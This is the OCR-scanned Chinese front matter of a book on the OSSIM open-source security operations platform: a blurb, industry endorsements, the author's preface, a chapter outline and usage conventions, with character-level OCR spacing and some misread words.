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内 容 简 介 


在 传统 的 异 构 网 络 环境 中 , 运 维 人 员 人 往往 利 用 各 种 复杂 的 监管 工具 来 管理 网 络 ， 由 于 缺乏 一 种 集成 安 
全 运 维 平台 ， 当 遇 到 故障 时 总 是 处 于 被 动 “救火 ”状态 ， 如 何 将 资产 管理 、 流 量 监控 、 漏 洞 管理 、 入 侵 监 
测 、 合 规 管理 等 重要 环节 ， 通 过 开源 软件 集成 到 统一 的 平台 中 ， 以 实现 安全 事件 关联 分 析 ， 可 从 本 书 介绍 
的 OSSIM 平台 中 找到 答案 。 本 书 借助 作者 在 OSSIM 领域 长 达 10 年 开发 应 用 实践 经 验 之 上 ， 以 大 量 生动 
实例 阐述 了 基于 插件 收集 日 志 并 实现 标准 化 ， 安 全 事件 规范 化 分 类 ， 关 联 分 析 的 精髓 ， 书 中 为 读者 展示 的 
所 有 知识 和 实例 均 来 自 大 型 企业 中 复杂 的 生产 环境 ， 并 针对 各 种 难题 给 出 解决 方案 。 

全 书 共 分 三 篇 ，10 章 : 第 一 篇 (第 1~2 章 ) 主要 介绍 OSSIM 架构 与 工作 原理 、 系 统 规划 、 实 施 关 键 
要 素 和 过 滤 分 析 SIEM 事件 的 要 领 。 第 二 篇 (第 3~6 章 ) 主要 介绍 OSSM 所 涉及 的 几 个 后 台数 据 库 ， 重 
点 强调 安全 事件 分 类 聚合 、 提 取 流 程 、 关 联 分 析 算法 、Snort 规则 分 析 等 技巧 。 第 三 篇 (第 7~10 章 ) 主要 
介绍 日 志 收集 方法 和 标准 化 实现 思路 以 及 在 OSSIM 中 用 HIDS/NIDS、NetFlow 抓 包 分 析 异 常 流量 的 方法 ， 
深入 分 析 了 OpenVAS 架构 和 脚本 分 析 方法 。 

本 书 可 以 作为 开源 安全 技术 研究 人 员 、 网 络 安全 管理 人 员 以 及 高 校 计算 机 专业 师 生 学 习 参 考 使 用 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防伪 标签 ， 无 标签 者 不 得 销售 
版 权 所 有 ， 侵 权 必 究 。 侵 权 举 报 电话 : 010-62782989 13701121933 
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51CTO 推荐 


认识 晨光 近 十 年 ， 旁 观 了 他 网 络 管理 实践 水 平 的 日 至 高 超 ， 也 见证 了 他 多 年 来 在 知识 及 
技能 的 整理 与 传播 方面 的 坚持 和 硕果 累累 。 晨 光 的 文章 和 著作 特点 明显 : 结合 实践 、 平 实 厚 
重 、 干 货 多 多 ， 也 因此 受到 读者 的 爱戴 。 在 本 书 发 表 之 前 ， 晨 光 已 经 发 表 了 OSSIM 的 博文 
六 十 余 篇 ， 可 想 而 知 他 为 本 书 出 版 的 积累 之 深 。 我 相信 ， 阅 读 此 书 ， 您 一 定 收获 满 满 ! 


XK SICTO 总 编 


51CTO 推荐 


李 晨光 老师 是 51CTO 专家 博 主 ， 也 是 51CTO 学 院 知 名 讲师 。 他 的 文章 深 受 同行 关注 和 
认可 , 荣获 了 多 项 殊荣 , 他 的 课程 在 学 院 深 受 学 员 喜 爱 。 新书 《开源 安全 运 维 平 台 一 一 OSSIM 
最 佳 实践 》 是 李 老 师 在 OSSIM 领域 长 达 10 年 开发 应 用 实战 经 验 的 总 结 和 凝练 ， 书 中 的 所 有 
知识 和 实例 均 来 自 大 型 企业 中 复杂 的 生产 环境 ， 并 针对 各 种 难题 给 出 解决 方案 ， 相 信 此 书 一 
定 会 深 受 广大 读者 的 支持 。 


51CTO 社区 、51CTO 学 院 


CSDN 推荐 


说 来 师 愧 ， 身 为 机 房 装 机 工 出 身 ， 竞 然 也 是 Google 了 半天 才 搞 清楚 什么 叫 OSSIM。 当 
年 在 机 房 苦 哈哈 地 安装 、 调 测 Nagios 和 Snort 的 场景 还 历历 在 目 ， 读 起 晨光 老师 的 这 本 《 开 
源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 》 自 然 倍 感 亲 切 。 

我 的 理解 ，OSSIM 是 安全 运 维 发 展 到 一 定 阶段 后 体系 化 、 工 程 化 的 成 果 ， 强 调 独立 安全 
应 用 间 的 配合 。 这 对 使 用 者 提出 了 很 高 的 要 求 : 不 仅 要 熟悉 系统 中 每 个 应 用 的 用 法 ， 还 要 清 
楚 安 全 信息 在 整个 系统 中 的 流转 ， 以 及 出 了 问题 后 的 准确 定位 。 这 不 仅 需 要 大 量 的 实践 ， 更 
需要 经 验 的 积累 。 这 本 书 的 内 容 ， 能 更 快 地 帮助 你 了 解 这 个 复杂 的 系统 。 更 为 难得 的 是 ， 书 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


中 包含 了 很 多 最 佳 实践 的 分 享 ， 对 于 有 一 定 经 验 的 读者 也 有 着 很 好 的 参考 意义 。 

作者 晨光 老师 在 安全 运 维 领域 耕耘 多 年 ， 书 中 的 内 容 ， 都 是 在 常年 工作 中 总 结 出 的 实战 
经 验 之 谈 ， 是 国内 第 一 本 系统 痔 述 OSSIM 理论 和 实践 的 作品 ， 更 是 一 个 有 追求 的 运 维 人 员 
在 成 长 路 程 上 不 可 多 得 的 资料 。 

然而 让 人 觉得 非常 可 惜 的 是 ， 国 内 系统 化 安全 运 维 的 理念 并 不 普及 ， 提 起 OSSM K, 
估计 知 其 然 的 人 就 不 多 ， 更 勿 论 知 其 所 以 然 者 。 希 望 晨光 老师 的 这 本 书 能 被 更 多 的 人 了 解 和 
学 习 ， 能 切切 实 实地 帮 到 奋斗 在 一 线 的 兄弟 们 。 我 想 ， 这 也 是 每 一 个 CSDN 人 的 愿望 。 


李 申 CSDN 社区 运营 总 监 、CSDN 学 院 总 监 


IT168 推荐 


多 年 来 ， 李 晨光 老师 一 直 是 众多 IT 圈 朋 友 的 良师益友 。 文 章 素来 结构 清晰 ， 布 局 平实 ， 
技术 内 容 扎实 ， 读 后 受益 良 多 。 欣 闻 李 晨光 老师 将 发 新 作 ， 想 来 又 是 一 次 技术 升华 的 历练 旅 
程 。 在 作者 的 描述 下 ，OSSIM 这 一 还 尚 处 于 发 端的 全 新 安全 运 维 架 构 扑 面 而 来 ， 读 来 不 忍 释 
手 。 原 因 有 三 : 

其 一 ， 信 息 安全 市 场 历来 与 开源 没有 渊源 ， 不 管 是 SIEM 还 是 SOC， 在 国内 普及 和 实践 
也 有 些 时 日 ， 但 一 直 不 温 不 火 ， 拱 上 开源 是 偶然 还 是 必然 ， 以 求 甚 解 ; 其 二 ， 诚 如 作者 所 言 ， 
“本 书 不 是 神功 秘籍 "” 只 为 读者 铺陈 经 验 、 答 疑 解 惑 。 而 信息 安全 之 于 企业 是 个 平衡 问题 ， 
安全 运 维 如 何在 快速 变化 的 动态 中 ， 找 到 最 佳 平 衡 支撑 ， 恰 恰 需 要 兼容 并 车 ;其 三 ， 想 来 ， 
数据 驱动 的 浪潮 或 已 不 远 ， 安 全 威胁 的 全 息 生 态 掌控 ， 玩 的 正 是 数据 、 事 件 和 风险 的 收集 和 
分 析 ， 要 主动 出 击 还 是 被 动 防御 ， 不 难 选择 。 作 为 先睹为快 者 ， 我 只 能 谈 一 些 浅见 ， 是 为 序 。 


陈毅 东 IT168 企业 级 副 总 编 


启明 星辰 专家 推荐 


安全 信息 与 事件 分 析 (SIEM) 技术 进入 中 国 也 有 十 几 年 了 ,但 是 就 如 同 以 STEM 为 核心 
的 安全 运营 中 心 (SOC) 一 样 ， 由 于 项 着 过 于 炫目 的 光环 ， 在 国内 的 发 展 始终 喜 忧 并 存 。 究 
其 缘由 ， 其 中 很 重要 的 一 点 就 在 于 SIEM 是 安全 分 析 的 集大成 技术 ， 涉 及 面 广 、 复 杂 度 高 ， 
对 使 用 者 要 求 也 比较 高 ， 而 国内 信息 安全 产业 的 发 展 以 及 安全 运 维 体系 还 未 完全 成 熟 。 

但 是 ， 安 全 事件 分 析 作 为 安全 运 维 的 核心 技术 无 可 替代 ， 是 企业 和 组 织 信息 安全 建设 以 


媒体 推荐 


及 安全 运 维 的 必然 选择 。 在 这 种 背景 下 ， 国 内 人 迫切 需要 一 系列 的 相关 书籍 来 传播 和 推广 相关 
技术 ， 本 书 无 疑 是 国内 安全 事件 分 析 技 术 领 域 的 重要 论著 。 

从 全 球 范围 来 看 ，SIEM 技术 发 展 已 趋 于 成 熟 ，2014 年 市 场 规模 接近 17 亿美 元 ， 商 业 公 
司 占据 了 大 部 分 的 市 场 。 其 中 ，OSSIM 是 唯一 成 功 的 开源 SIEM. M 2003 年 发 布 第 一 个 版 本 
至 今 , OSSIM 已 经 发 展 了 12 年 , 足见 其 强大 的 生命 力 。 而 以 OSSIM 为 基础 成 立 的 AlienVault 
公司 也 已 经 成 为 SIEM 领域 的 知名 公司 。 

OSSM 作为 一 个 开源 安全 运 维和 安全 事件 分 析 平 台 ， 较 好 地 集成 了 各 种 开源 的 安全 工 
具 ， 并 能 够 与 大 量 商 业 化 的 安全 产品 进行 对 接 ， 同 时 还 具备 很 强 的 扩展 能 力 ， 真 正成 为 一 个 
安全 运 维 的 开放 式 平台 。 

李 晨 光 先 生 是 国内 OSSIM 领域 的 权威 人 士 ， 对 安全 运 维 有 深刻 的 理解 ， 拥 有 丰富 的 实 
战 经 验 ， 书 中 汇集 了 他 多 年 的 实践 成 果 ， 十 分 难得 。 跟 随 晨光 学 习 OSSIM， 不仅 能 够 提升 自 
身 的 安全 运 维 实战 能 力 ， 也 有 助 于 理解 安全 运 维 体系 和 安全 事件 分 析 运 作 原 理 。 


DERE 启明 星辰 泰 合 SOC 产品 总 监 、SOC 布道 师 


ChinaUnix 推荐 


晨光 是 ChinaUnix 专家 博 主 , 在 Unix/Linux 领域 工作 多 年 , 在 ChinaUnix 发 表 了 很 多 
高 质量 的 技术 文章 和 Linux. 教学 视频 , 深 受 广大 网 友 喜 爱 .《 开 源 安全 运 维 平台 一 一 OSSIM 
最 佳 实践 》 一 书 是 他 多 年 研究 成 果 的 总 结 ， 也 是 业界 第 一 本 关于 开源 安全 运 维 的 著作 , B 
中 采用 了 大 量 实例 生动 地 讲解 了 OSSIM 的 安装 和 使 用 过 程 ,深入 浅 出 地 分 析 了 OSSIM X 
联 分 析 等 核心 技术 ， 引 入 了 作者 多 年 对 OSSIM 技术 的 研究 成 果 和 实践 经 验 ， 这 对 于 开阔 
读者 眼界 ， 提 高 技术 水 平 将 大 有 神 益 。 如 果 你 从 事 系 统 运 维 ， 对 网 络 安全 感 兴趣 ， 我 们 强 
烈 推 荐 此 书 。 


ChinaUnix 社区 


Linux 中 国 推荐 


从 2011 FE, 我 就 在 电信 系统 从 事 网 络 安 全 方面 的 工作 ,期 间接 触 了 不 少 企业 客户 ， 有 
央企 、 也 有 中 小 型 公司 。 发 现 很 多 时 候 ， 企 业 在 应 对 信息 化 普及 所 带 来 的 变化 时 有 些 力 不 从 
心 。 较 大 的 企业 ， 其 企业 信息 化 也 比较 完善 ， 除 了 大 量 的 服务 器 、 终 端 计算 机 、 网 络 设备 之 
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外 ， 也 有 各 种 网 络 安全 方面 的 专用 设备 和 软件 ， 但 是 ， 随 着 规模 的 扩大 设备 的 管理 、 信 息 的 
归 集 会 越 来 越 步 入 低 效 ， 往 往 导致 各 种 设备 资产 并 不 能 及 时 有 效 地 发 挥 作用 。 

面 对 企业 的 大 量 的 IT 设备 管理 包括 多 个 方面 ， 从 资产 管理 、 网 络 监控 、 漏 洞 管理 、 入 侵 
检测 等 都 有 各 种 管理 规范 和 相应 的 软 硬 件 设备 ， 那 么 增加 这 些 管理 系统 是 否 又 进一步 加 剧 了 
信息 腾 肿 呢 ? 过 去 的 做 法 是 ， 针 对 每 个 细 分 都 有 一 套 妃 至 几 套 系统 来 管理 ， 而 这 些 系统 之 间 
并 不 能 互相 协调 、 信 息 共享 ， 往 往 导 致 自 相 矛 盾 ， 让 管理 人 员 无 所 适 从 。 当 时 ， 似 乎 并 没有 
一 个 可 以 全 面 地 、 可 靠 地 解决 这 些 问 题 的 方案 。 

举 个 例子 ， 某 国有 大 型 银行 ， 其 为 了 应 对 网 络 安全 风险 ， 除 了 防火 墙 之 外 ， 还 专门 部 署 
T IDS WI IPS 设备 ， 但 是 随后 发 现 各 种 事件 、 消 息 如 洪水 般 涌 来 ， 将 真正 有 价值 的 信息 都 淹 
没 在 了 各 种 信息 噪音 之 中 。 由 于 并 不 能 针对 企业 实际 的 情况 有 效 地 降低 无 关 或 常规 信息 的 干 
HR, 导致 每 天 发 送 的 例 行 报告 , 也 就 真 的 成 为 了 “ 例 行 ” 从 而 只 是 增加 了 收 件 箱 中 的 某 个 文 
件 夹 的 未 读 邮件 的 数字 而 已 。 

那么 ， 如 何 从 纷 杂 的 信息 中 及 时 准确 地 将 重点 的 信息 搬 取 出 来 ? 如 何 将 各 个 设备 、 功 能 
从 各 个 方面 ， 一 致 而 完整 地 联系 起 来 ? 

有 幸 认 识 了 晨光 老师 ， 听 他 深入 浅 出 地 介绍 了 OSSM 系统 ， 才 发 现 这样 的 一 套 开源 解 
决 方 案 ， 恰恰 满足 了 大 部 分 企业 在 这 方面 的 需求 。OSSIM 是 开源 软件 ， 在 没有 接触 OSSIM 
之 前 ， 很 多 人 会 对 它 抱 有 一 些 疑 虑 ， 担 心 它 的 健壮 性 不 足 ， 担 心 它 的 功能 不 够 全 面 ， 甚 至 担 
心 它 一 如 很 多 开源 软件 那样 丑陋 。 但 是 OSSIM 让 我 一 个 在 开源 圈 混 迹 了 多 年 的 老兵 也 很 吃 
惊 ， 其 表现 绝对 可 以 令 人 眼前 一 亮 。 那 么 具体 OSSM 是 怎么 样 的 呢 ? 这 个 问题 可 不 是 一 两 
句 话 能 说 明白 的 ， 想 详尽 了 解 OSSIM 的 读者 ， 请 阅读 这 本 晨光 老师 的 力作 吧 ! 


王 兴 宇 Linux 中 国 〈https:Wlinux.cn/) 创始 人 、 前 中 国电 信 高 级 专家 
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接 到 晨光 让 我 为 他 的 新 作 写 序 的 邀请 后 ， 我 诚 性 诚 蚤 ， 尽 管 已 经 在 技术 圈 里 瞎 混 了 十 几 
载 。 但 是 运 维 对 我 来 说 既 熟悉 又 防 生 ， 虽 然 做 开发 ， 但 几乎 天 天 都 要 接触 运 维 的 工作 ， 从 服 
务 器 安装 、 应 用 环境 安装 到 应 用 部 署 ， 以 及 后 期 的 维护 、 扩 容 和 安全 等 等 方面 ， 特 别 一 开始 
做 开源 中 国 网 站 时 ， 更 是 事 无 巨细 、 亲 力 亲 为 ; 但 是 跟 晨 光 接 触 两 年 来 ， 深 感 自己 所 做 的 这 
些 是 多 么 的 微不足道 。 

从 自己 的 从 业经 验 来 看 , 运 维 着 实 是 一 件 非常 专业 的 工作 , 而 且 要 求 经 验 必 须 非常 丰富 ， 
才能 从 各 种 五 花 八 门 的 现象 中 进行 问题 定位 ， 从 海量 日 志 中 分 析 问 题 ， 从 而 制定 行 之 有 效 的 
解决 问题 的 方案 。 当 一 个 系统 规模 不 断 扩大 的 过 程 中 ， 运 维 工 作 日 趋 重 要 。 

在 开源 领域 中 有 大 量 跟 运 维 相关 的 开源 软件 ， 光 开源 中 国 网 站 就 收录 了 运 维 相关 的 工具 
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超过 400 款 ， 而 OSSIM 就 是 其 中 非常 优秀 的 一 款 。OSSIM 是 目前 一 个 非常 流行 和 完整 的 开 
源 安全 架构 体系 。OSSIM 通过 将 开源 产品 进行 集成 ， 从 而 提供 一 种 能 够 实现 安全 监控 功能 的 
基础 平台 。 它 的 目的 是 提供 一 种 集中 式 、 有 组 织 的 、 能 够 更 好 地 进行 监测 和 显示 的 框架 式 系 
统 。 晨 光 的 这 本 书 从 OSSIM 的 架构 原理 、 安 装 部 署 ， 再 到 内 部 架构 、 高 性 能 部 署 以 及 应 用 
场景 的 实战 等 方面 进行 非常 详细 的 讲解 ， 不 仅 对 软件 的 初学 者 适用 ， 而 且 对 经 验 丰富 的 工程 
师 都 有 非常 高 的 参考 价值 。 

从 此 书 的 篇 幅 便 知 运 维 工 作 之 复杂 ， 唯 有 孜孜 以 求 方 能 在 强手 之 林 有 立 锥 之 地 ， 与 君 共 
fl o 
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HU m 


为 什么 要 写作 本 书 


1. 现状 

日 常 工作 中 ， 运 维 人 员 大 部 分 时 间 和 精力 都 用 于 处 理 简单 、 重 复 的 问题 ， 由 于 故障 预警 
机 制 不 完善 ， 往 往 故 障 发 生 后 才 会 进行 处 理 ， 运 维 人 员 经 常 处 于 被 动 “ 救 火 ” 状 态 。 

没有 高 效 的 管理 工具 支持 ， 就 很 难 快速 处 理 故 障 。 市 面 上 有 很 多 运 维 监控 工具 ， 例 如 商 
业 版 的 Solarwinds, ManageEngine 以 及 WhatsUp 等 ,开源 的 MRTG, Nagios. Cacti, Zabbix, 
OpenNMS、Ganglia 等 。 由 于 它们 彼此 之 间 没 有 联系 ， 即 便 部 署 了 这 些 工 具 ， 很 多 运 维 人 员 
并 没有 从 中 真正 解脱 出 来 ， 成 干 上 万 条 警告 信息 堆积 在 一 起 ， 很 难 识别 问题 的 根源 ， 结 果 被 
海量 日 志 所 淹没 ， 无 法 解脱 出 来 。 

另外 ， 在 传统 运 维 环境 中 ， 当 查看 各 种 监控 系统 时 需要 多 次 登录 ， 查 看 繁多 的 界面 ， 更 
新 管理 绝 大 多 数 工 作 主 要 是 手工 操作 ， 即 使 一 个 简单 的 系统 变更 ， 也 需要 运 维 人员 逐一 登录 
系统 ， 若 遇 到 问题 ， 管 理 员 便 会 在 各 种 平台 间 来 回 查 询 ， 或 靠 人 肉 方式 搜索 故障 关键 词 ， 不 
断 地 重复 着 这 种 工作 方式 。 企 业 需 要 一 种 集成 安全 的 运 维 平台 ， 满 足 专业 化 、 标 准 化 和 流程 
化 的 需要 来 实现 运 维 工 作 的 自动 化 管理 ， 通 过 关联 分 析 及 时 发 现 故 障 隐患 。 

2. 手工 整合 的 演化 过 程 

在 人 工 管理 初期 , 主要 依靠 一 些 简 单 的 Shell 脚本 完成 一 些 基 础 工作 , 后 来 虽然 采用 Cacti 
来 做 性 能 监控 ，Nagios 做 主机 监控 、PHP+SSH 等 方式 进行 管理 ， 但 各 种 运 维 工具 仍 无 法 实 
现 数据 共享 ， 此 时 整个 防御 体系 面 对 网 络 威胁 “反应 迟钝 ” 每 当 故 障 来 袭 ， 总 是 “马后炮 凡 
难以 查找 攻击 者 的 踪迹 ， 就 好 像 一 个 人 总 被 蚊子 叮咬 ， 想 打 蚊 子 可 手眼 又 跟 不 上 的 感觉 。 

经 过 分 析 后 ， 开 始 尝 试 将 资产 管理 模块 、 入 侵 检 测 模 块 、 流 量 监控 模块 、 漏 洞 扫描 模块 
集成 到 一 台 服 务 器 中 进行 统一 管理 ， 实 现 了 标准 化 日 志 、 统 一 处 理 等 任务 ， 在 系统 改造 中 以 
下 问题 尤为 突出 : 
安装 时 软件 依赖 问题 难以 解决 。 
各 子 系统 界面 重复 验证 和 界面 风格 不 统一 。 
各 子 系统 之 间 数 据 无 法 共享 。 
无 法 实现 数据 之 间 关 联 分 析 。 
无 法 生成 统一 格式 的 报表 。 
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e 缺乏 统一 的 仪表 板 以 展示 重要 信息 。 
e 系统 维护 难度 增 大 。 


将 这 些 开源 工具 集成 比较 困难 ， 该 方案 架构 并 不 合理 ， 出 现 了 性 能 瓶颈 ， 对 于 安全 事件 
的 关联 分 析 、 合 规 管理 及 知识 库 查 询 依然 无 法 实现 。 

3. 终极 工具 一 一 OSSIM 集成 安全 运 维 的 平台 

发 现 一 个 好 的 管理 平台 并 不 是 偶然 ， 管 理 员 从 最 原始 的 命令 行 的 运 维 时 代 ， 进 化 到 统一 
管理 平台 ， 的 确 要 走 很 多 弯路 ， 其 实 这 一 过 程 就 是 普通 管理 员 到 专家 的 赔 变 。 只 有 经 历 过 磨 
难 的 管理 员 才 能 深刻 体会 到 这 一 点 。 一 款 优秀 的 安全 运 维 平台 ， 需 要 将 事件 与 IT 流程 相关 
联 ， 第 选 出 运 维 人 员 最 关心 的 事件 ， 提 高 工作 效率 。 

目前 能 满足 上 述 要 求 的 开源 产品 只 有 OSSIM 系统 , 它 是 由 AlienVault 公司 开发 的 , 现 分 
为 开源 OSSIM 和 商业 版 USM 两 种 , 通过 该 平台 实现 对 用 户 操作 规范 的 约束 和 对 计算 机 资源 
进行 监控 ， 包 括 服务 器 、 数 据 库 、 中 间 件 、 存 储备 份 、 网 络 基础 设施 ， 通 过 自动 监控 管理 平 
台 实 现 故 障 综合 处 理 和 集中 管理 ， 能 够 为 您 的 网 络 构建 起 一 套 敏感 的 、 全 方位 的 中 枢 神 经 系 
统 ， 达 到 感知 网 络 威胁 的 效果 。 


创作 过 程 


WERK, RA OSSIM 还 是 挺 有 缘分 。 研 究 生 时 曾 开发 过 开源 统一 安全 管理 平台 项 目 
主要 目标 是 将 不 同 网 络 设备 和 服务 器 的 日 志 ， 通 过 标准 化 转化 为 事件 ， 然 后 统一 进行 日 志 分 
析 与 设备 联动 。 在 完成 这 个 项 目 过 程 中 ， 主 要 参考 OSSIM 源 代码 ， 先 后 尝试 了 基于 统计 、 
基于 距离 和 基于 决策 树 的 算法 ， 攻 破 了 网 络 安全 事件 聚合 的 难题 。 

这 些 年 先后 为 儿 十 家 单位 成 功 部 署 了 OSSIM 系统 ， 并 提供 技术 支持 。 在 OSSIM 项 目 实 
施 过 程 中 不 断 总 结 遇 到 的 各 种 问题 ， 经 过 三 年 的 技术 沉淀 与 积累 ， 目 前 已 经 撰写 出 600 多 页 
的 OSSIM 应 用 教程 ， 但 是 这 些 零散 的 手稿 不 成 体系 。 从 2015 年 初 ， 开 始 将 这 些 系统 部 署 的 
经 验 进行 合理 组 织 ， 全 书 规划 成 三 篇 ， 共 10 章 内 容 ， 这 些 内 容 包 含 OSSIM 系统 的 各 种 知识 
和 技巧 ， 使 读者 今后 再 遇 到 问题 能 够 举一反三 。 即 使 OSSIM 更 新 升级 后 ， 读 者 也 能 结合 书 
中 介绍 的 概念 和 操作 方法 ， 同 样 能 够 掌握 ， 那 么 本 书 的 目标 就 达到 了 。 

ME IT 工作 的 人 都 比较 忙 , 很 少 有 完整 的 时 间 能 清闲 下 来 , 对 于 一 般 人 而 言 没有 时 间 就 
是 最 好 的 蛋子 ， 而 善于 利用 时 间 的 人 往往 能 够 利用 各 种 间隙 进行 创作 构思 。 在 本 书 创作 中 并 
不 是 一 帆 风 顺 , 有 时 候 为 了 验证 一 个 技术 问题 需要 反复 实验 , 为 了 一 句 话 需要 经 过 反复 推 客 。 

初稿 出 炉 ， 必 须 经 过 不 断 修改 润色 才 适 合 阅读 。 本 书 刚刚 写 完 时 才 500 多 页 ， 但 是 在 一 
遍 又 一 遍 的 修改 笔 误 和 错别字 之 后 ， 萌 发 出 新 的 想法 ， 每 复查 一 遍 ， 我 都 会 对 原稿 做 一 些 改 
动 ， 数 量 上 要 数 第 一 次 改动 扩充 最 大 ， 以 后 逐渐 减少 ， 直 到 满意 为 止 。 


VIII 


Dll 


本 书 不 是 什么 神功 秘籍 ,无 法 让 你 在 短 时 间 内 从 一 个 小 白 变 成 一 个 牛人 。 书 中 以 OSSIM 
4 平台 为 基础 进行 讲解 ， 将 各 种 开源 软件 合理 地 融入 进来 , 并 把 本 人 多 年 OSSIM 实施 经 验 以 
案例 的 形式 表达 出 来 。 学 习 OSSIM 的 道路 并 不 是 一 帆 风 顺 ， 希 望 读者 朋友 再 遇 到 困难 时 ， 
本 书 能 够 为 您 答疑 解 惑 。 


篇 章 结构 


书 的 结构 好 比 框架 ， 而 内 容 则 是 具体 组 成 元 素 ， 本 书 采用 了 文字 、 图 表 和 范例 等 形式 ， 

将 OSSIM 复杂 的 结构 和 工作 流程 直观 地 展现 给 读者 。 全 书 分 为 三 部 分 ， 共 10 章 。 
1. 基础 篇 

第 1 章 : KEA OSSIM 起 源 讲 起 ,介绍 了 目前 运 维 人 员 现状 ,逐步 谈 到 应 用 SIEM 的 必 
要 性 ， 进 而 介绍 OSSIM 架构 与 组 成 原理 ， 另 外 还 介绍 了 基于 插件 的 日 志 采 集 思 路 ， 提 出 标 
准 化 安全 事件 的 全 新 理念 ， 详 细 分 析 了 OSSIM 的 高 可 用 架构 与 实现 方法 。 

第 2 章 : 本 章 从 OSSIM 实施 关键 要 素 、 安 装 策略 、 硬 件 选 型 开始 ， 深 入 分 析 单 机 部 署 ， 
分 布 式 体系 、 传 感 器 设置 等 重要 安装 工作 。 分 析 安 装 过 程 以 图 文 并茂 的 方式 ， 指 出 了 系统 配 
置 过 程 ， 包 括 实体 机 、 虚 拟 机 不 同 环境 中 的 安装 方法 及 注意 事项 。 最 后 重点 分 析 了 SIEM 事 
件 控 制 台 的 使 用 和 事件 过 滤 方 法 。 

2. 提高 篇 

第 3 章 : 本 章 对 于 OSSIM 开发 人 员 很 有 帮助 ， 除 了 介绍 OSSIM 数据 库 组 成 、 表 结构 ， 
以 及 系统 迁移 备份 等 技巧 以 外 ， 还 包括 各 种 常见 MySQL 故障 等 内 容 。 

第 4 章 : 本 章 从 关联 分 析 基 础 讲 起 ， 逐 步 深 入 到 OSSIM 安全 事件 提取 过 程 ， 介 绍 了 常 
用 的 关联 分 析 算 法 。 还 对 报警 事件 的 聚合 原理 做 了 详细 分 析 ， 并 结合 OSSIM 现状 采用 多 个 
实例 讲解 关联 规则 和 自 定义 策略 的 使 用 方法 。 

第 5 章 : 本 章 主 要 介绍 各 种 OSSIM 系统 中 的 监控 调试 工具 的 使 用 ， 以 及 系统 瓶颈 的 诊 
断 方法 。 

第 6 章 : 本 章 重点 介绍 Snot 原理 和 预 处 理 程序 发 挥 的 作用 ， 包 括 Snort 报警 方法 。 深 
入 分 析 Snort 规则 编写 在 OSSIM 中 的 应 用 技巧 以 及 网 络 异常 行为 分 析 方 法 。 

3. 实战 篇 

第 7 章 : 本 章 从 日 志 标 准 化 和 收集 分 析 方 法 讲 起 ， 详 细 分 析 各 种 服务 、 网 络 设备 所 产生 
的 日 志 ， 包 括 Apache, FTP, Squid, DHCP 等 ， 并 通过 实例 详细 介绍 OSSIM 插件 开发 过 程 。 

第 8 章 : 本 章 讲解 NetFlow 进行 异常 流量 分 析 的 方法 ， 包 括 NetFlow 数据 采集 和 过 滤 方 
法 ， 介 绍 了 分 布 式 环境 中 ， 利 用 NetFlow 监测 异常 流量 的 技巧 ， 同 时 针对 OSSIM 中 Ntop、 
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Nagios、NetFlow 三 种 检测 工具 的 使 用 方法 进行 了 对 比 。 最 后 还 介绍 了 Cacti 和 Zabbix 第 三 
方 开源 监控 软件 集成 的 方法 。 

第 9 章 : KEMA OSSM 控制 管理 中 心 角色 权限 控制 讲 起 ， 全 面 介绍 了 OSSIM Web UI 的 
结构 , 讲解 了 OSSEC 日 志 分 析 工 具 的 配置 使 用 和 A gent 的 安装 方法 。 介 绍 了 OSSIM 中 管理 网 
络 资产 的 实例 , 并 对 OpenVAS 扫描 模块 、 脚 本 以 及 规则 做 了 深入 分 析 。 展示 了 多 个 利用 OSSIM 
进行 高 级 攻击 检测 的 实例 ， 以 及 利用 OSSIM 进行 合 规 管理 和 系统 统一 报表 输出 的 方法 。 

第 10 章 : 本 章 主要 讲解 基于 Web 方式 下 的 抓 包 及 数据 包 过 滤 方 法 ， 并 采用 该 工具 远程 
解决 网 络 故障 的 方法 ,重点 介绍 了 tshark、tcpdump 等 抓 包 工具 的 高 级 使 用 方法 , 最 后 以 一 个 
典型 正 浏览 器 的 0 day 漏洞 攻击 的 实例 来 检验 这 种 工具 所 发 挥 的 作用 。 


本 书 约定 


(1) 关于 版 本 
本 书 软件 的 安装 环境 为 Debian Linux 6.0( Squeeze)， 内 核 为 2.6.32。 在 安装 其 他 软件 时 ， 
必须 符合 该 版 本 要 求 。 
(2) 关于 菜单 的 描述 
OSSIM 的 前 台 界 面 复杂 , 书 中 经 常会 用 一 串 带 箭头 的 单词 表达 菜单 的 路 径 , 例如 Web UI 
的 Dashboards 一 Overview 一 Executive， 表 示 Web 界面 下 鼠标 依次 经 过 菜单 Dashboards, 
Overview， 最 后 到 达 Executive 仪表 板 。 
G) 路 径 问 题 
本 书 中 除 特 别 说 明 , 所 涉及 路 径 均 指 在 OSSIM 系统 下 的 路 径 , 而 不 是 其 他 的 Linux 发 行 
版 。 终端 控制 台 指 通 过 root 登录 系统 ， 然 后 输入 “ossim-setup” 启 动 OSSIM 终端 控制 台 的 界 
面 ， 如 图 1 所 示 。 


图 1 终端 控制 台 
在 终端 控制 台 下， 选择 Jailbreak System 菜单 就 能 进入 Root shell， 登 录 日 志 会 保存 在 


串 


/var/log/ossim/root access.log 文件 中 。 
(4) SIEM 事件 分 析 控 制 台 
书 中 的 SIEM 控制 台 是 指 通过 Web UI 进入 系统 ， 在 菜单 Analysis 一 SIEM 下 的 界面 ， 如 


图 2 所 示 。 
人 
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图 2 SIEM 事件 分 析 控制 台 
(5) 关于 OSSIM Server 端 与 Sensor 端的 约定 
本 书 各 章 中 讲述 的 OSSIM Server 端 , 是 指 通过 Alienvault USM 安装 的 系统 , 包括 OSSIM 
四 大 组 件 ，Sensor 端 是 通过 Alienvault Sensor 安装 的 系统 。 
(6) 关于 地 图 显示 问题 
所 有 地 图 信息 引 自 谷歌 地 图 ， 大 家 在 做 实验 前 确保 能 连 上 谷歌 地 图 ， 而 且 使 用 系统 中 
OTX， 前 提 条 件 也 需要 能 连接 到 谷歌 。 
(7) 浏览 器 约定 
OSSIM Web UI 适合 采用 Safari 7.0 以 上 、Google Chrome 44.0 LAE, IE 10.0 以 上 浏览 器 
访问 。 


本 书 读者 对 象 


本 书 主要 面向 以 下 类 型 读者 : 


e 互联 网 和 安全 行业 的 系统 安全 从 业 人 员 。 
e 银行 、 证 券 和 保险 行业 IT 运 维 人 员 。 
e 政府 、 高 校 和 科研 机 构 等 单位 IT 运 维 人 员 。 
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光盘 内 容 


容 ， 


